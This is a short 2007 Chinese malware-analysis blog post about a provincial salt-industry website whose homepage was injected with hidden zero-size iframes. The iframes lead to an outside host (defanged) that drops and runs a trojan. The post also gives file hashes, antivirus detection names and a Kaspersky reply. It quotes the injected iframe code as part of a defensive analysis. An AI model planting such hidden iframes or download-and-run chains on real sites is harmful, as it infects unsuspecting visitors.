某省盐业网被植入传播Trojan.DL.Win32.Agent.zrc的代码

某省盐业网被植入传播Trojan.DL.Win32.Agent.zrc的代码

endurer 原创
2007-10-29 第1版

该网站首页的首部和尾部被加入代码：
/---
＜iframe src=hxxp://h*ot**peak.host**.2*w**cn.com/wm/index.htm width=0 height=0＞＜/iframe＞
---/

hxxp://h*ot**peak.host**.2*w**cn.com/wm/index.htm 的检查cookies变量HeiYeNo2，若不存在则创建，并输出代码：
/---
＜iframe width=0 height=0 src=tcsafe.htm＞＜/iframe＞
＜iframe src=hxxp://h*ot**peak.host**.2*w**cn.com/wm/tcsafe.htm width=0 height=0＞＜/iframe＞
---/

tcsafe.htm 下载 xxz.exe，保存为 tcsafe.com 并运行。

文件说明符 : d:/test/xxz.exe
属性 : A---
语言 : 中文(中国)
文件版本 : 6.00.2900.2180 (xpsp_sp2_rtm.040803-2158)
说明 : Win32 Cabinet Self-Extractor                                          
版权 : (C) Microsoft Corporation. All rights reserved.
备注 :
产品版本 : 6.00.2900.2180
产品名称 : Microsoft(R) Windows(R) Operating System
公司名称 : Microsoft Corporation
合法商标 :
内部名称 : Wextract               
源文件名 : WEXTRACT.EXE           
创建时间 : 2007-10-26 12:17:32
修改时间 : 2007-10-26 12:17:36
访问时间 : 2007-10-26 12:22:53
大小 : 386560 字节 377.512 KB
MD5 : 452ec2b7ec2f9823a37874e90c55319d
SHA1: 87ABA7445FED3CD5CE2A4DF7CC705902A50B3A8A
CRC32: 07ca93ce

瑞星报为：Trojan.DL.Win32.Agent.zrc＞＞aspr.ske.2.x.new＞＞3.exe＞＞pe_patch(14)＞＞pe_patch(14)

 

主　题：	RE: xxz.exe [KLAB-3175811]
发件人：	"" <newvirus@kaspersky.com>   <script language="JavaScript" type="text/javascript"> </script>	发送时间：2007-10-26 13:31:08

Hello.
Trojan-Dropper.Win32.Agent.ceb
New malicious software was found in the attached file.
It's detection will be included in the next update. Thank you for your help.
-----------------
Regards, Yury Nesmachny
Virus Analyst, Kaspersky Lab.